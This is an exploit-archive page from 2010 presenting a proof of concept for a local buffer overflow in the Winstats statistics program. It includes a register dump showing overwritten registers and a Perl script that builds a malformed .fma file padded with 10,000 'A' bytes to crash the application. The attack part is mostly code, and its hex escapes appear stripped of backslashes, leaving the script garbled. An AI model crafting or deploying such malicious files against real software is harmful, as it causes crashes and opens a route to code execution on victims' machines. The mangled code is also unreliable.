Winstats (.fma) Local Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Winstats (.fma) Local Buffer Overflow PoC
# Published : 2010-06-24
# Author : MadjiX
# Previous Title : Wincalc 2 (.num) local Buffer Overflow PoC
# Next Title : Weborf HTTP Server Denial of Service Vulnerability

###################################################################
#Exploit Title : Winstats (.fma) local Buffer Overflow Poc
#tested on windows xp SP 3 FR
#Author: MadjiX
#Special Greets:His0k4 [ where are you :( ]
#Greets:Bibi-info , Silectovic , Volc4n0
#App: http://math.exeter.edu/rparris/peanut/wsfr32z.exe
###################################################################
#-->Fenètre-->1variable-->Fichier-->Ouvrir--> Open madjix.fma file
#Note:Open the file twice i dont no why
#EAX 0000060E
#ECX 00000000
#EDX 00D66898
#EBX 616D662E
#ESP 0012F74C
#EBP 0012F750
#ESI 00AD7AE0
#EDI 41414141
#EIP 00432675 wstatfr.00432675
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 0  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFDF000(FFF)
#T 0  GS 0000 NULL
###################################################################
my $file= "MadjiX.fma";

my $hd = "xB9x01x00x00x09x00x00x00".
"x50x00x00x00x5Dx00x00x00".
"x00x02x00x00x00x02x00x00".
"x00x00x00x00x01x00x00x00".
"x3Dx00x00x00xD9xFFxFFxFF".
"x2Cx01x00x00x64x00x00x00".
"x64x00x00x00x00x00x00x00".
"x00x00x00x00x0A";

my $ft = "x0Ax00x00x00x0Ax00x00x00x0Ax00".
"x00x00x0Cx00x00x00xF0xFFxFFxFF".
"x00x00x00x00x00x00x00x00x00x00".
"x00x00x90x01x00x00x00x00x00x00".
"x08x02x01x31x43x6Fx75x72x69x65".
"x20x4Ex65x77x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00xF3xFFxFFxFFx00".
"x00x00x00x00x00x00x00x00x00x00".
"x00x90x01x00x00x00x00x00x02x08".
"x02x01x31x53x79x6Dx62x6Fx6Cx00".
"x20x4Ex65x77x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00xF3xFFxFFxFFx00".
"x00x00x00x00x00x00x00x00x00x00".
"x00x90x01x00x00x00x00x00x00x08".
"x02x01x31x43x6Fx75x72x69x65x72".
"x20x4Ex65x77x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00xF5xFFxFFxFFx00".
"x00x00x00x00x00x00x00x00x00x00".
"x00x90x01x00x00x00x00x00x00x08".
"x02x01x31x43x6Fx75x72x69x65x72".
"x20x4Ex65x77x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00xF0xFFxFFxFFx00".
"x00x00x00x00x00x00x00x00x00x00".
"x00x90x01x00x00x00x00x00x00x08".
"x02x01x02x54x69x6Dx65x73x00x72".
"x20x4Ex65x77x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00xF5xFFxFFxFFx00".
"x00x00x00x00x00x00x00x00x00x00".
"x00x90x01x00x00x00x00x00x00x08".
"x02x01x31x43x6Fx75x72x69x65x72".
"x20x4Ex65x77x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00xF3xFFxFFxFFx00".
"x00x00x00x00x00x00x00x00x00x00".
"x00x90x01x00x00x00x00x00x00x08".
"x02x01x31x43x6Fx75x72x69x65x72".
"x20x4Ex65x77x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00xF3xFFxFFxFFx00".
"x00x00x00x00x00x00x00x00x00x00".
"x00x09x00x10x00x00x00x00x00x00".
"x80x20x13x14x36xF7x57x26x96x57".
"x22x04xE6x57x70x00x00x00x00x00".
"x00x00x00x00x00x00x00";

my $junk = "x41" x 10000 ;

open($FILE,">$file");
print $FILE $hd.$junk.$ft;
close($FILE);